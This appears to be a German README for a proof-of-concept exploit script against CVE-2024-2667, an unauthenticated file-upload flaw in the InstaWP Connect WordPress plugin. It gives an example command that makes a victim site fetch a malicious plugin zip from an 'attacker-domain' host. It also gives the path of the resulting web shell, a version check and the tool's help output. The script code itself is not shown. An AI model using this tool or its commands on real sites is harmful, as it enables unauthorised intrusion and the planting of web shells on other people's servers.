CVE-2024-2667-Poc 🚀
Beschreibung
Das InstaWP Connect – 1-click WP Staging & Migration Plugin für WordPress ist anfällig für das Hochladen beliebiger Dateien aufgrund unzureichender Dateivalidierung im REST-API-Endpunkt /wp-json/instawp-connect/v1/config in allen Versionen bis einschließlich 0.1.0.22. Dadurch können nicht authentifizierte Angreifer beliebige Dateien hochladen.
Skript-Verwendungsanleitung ⚙️
Installationsanforderungen
| Beschreibung | Details | Icon |
|---|
| Erforderliche Bibliotheken installieren | Verwenden Sie pip, um die erforderlichen Python-Bibliotheken zu installieren: requests und beautifulsoup4. | 🛠️ |
| Befehl zum Installieren | Führen Sie aus: pip install requests beautifulsoup4. | 📥 |
Skript ausführen
| Beschreibung | Details | Icon |
|---|
| Skript ausführen | Führen Sie das Skript über die Befehlszeile mit den erforderlichen Argumenten aus. | 🚀 |
| Erforderliche Argumente | - -up: Plugin-URL (z. B. http://attacker-domain/malicious-plugin.zip). | |
| - -u: Ziel-WordPress-URL (z. B. http://victim-domain/). | 🔧 |
| Beispielbefehl | python CVE-2024-2667.py -up http://attacker-domain/malicious-plugin.zip -u http://victim-domain/ | 📜 |
Schwachstelle prüfen
| Beschreibung | Details | Icon |
|---|
| Versionsprüfung | Das Skript untersucht die Datei readme.txt auf die Version des Ziel-Plugins. | 🔍 |
| Verwundbare Version | Wenn die Version <= 0.1.0.22 ist, gibt das Skript aus: The site is vulnerable. | ⚠️ |
| Sichere Version | Wenn die Version > 0.1.0.22 ist, gibt das Skript aus: The site is not vulnerable. | ✅ |
Shell-Speicherort
| Beschreibung | Details | Icon |
|---|
| Shell-Pfad | Wenn der Upload erfolgreich ist, ist die Shell erreichbar unter: | 🐚 |
| wp-content/plugins/instawp-connect/shell.php. | |
Verwendung -help
usage: CVE-2024-2667.py [-h] -up URL_PLUGIN -u URL_TARGET
The InstaWP Connect – 1-click WP Staging & Migration plugin for WordPress is vulnerable to arbitrary file uploads due
to insufficient file validation in the /wp-json/instawp-connect/v1/config REST API endpoint in all versions up to, and
including, 0.1.0.22. This makes it possible for unauthenticated attackers to upload arbitrary files.
options:
-h, --help show this help message and exit
-up URL_PLUGIN, --url_plugin URL_PLUGIN
URL of the plugin (e.g., http://attacker-domain/malicious-plugin.zip).
-u URL_TARGET, --url_target URL_TARGET
URL of the target WordPress site (e.g., http://victim-domain/).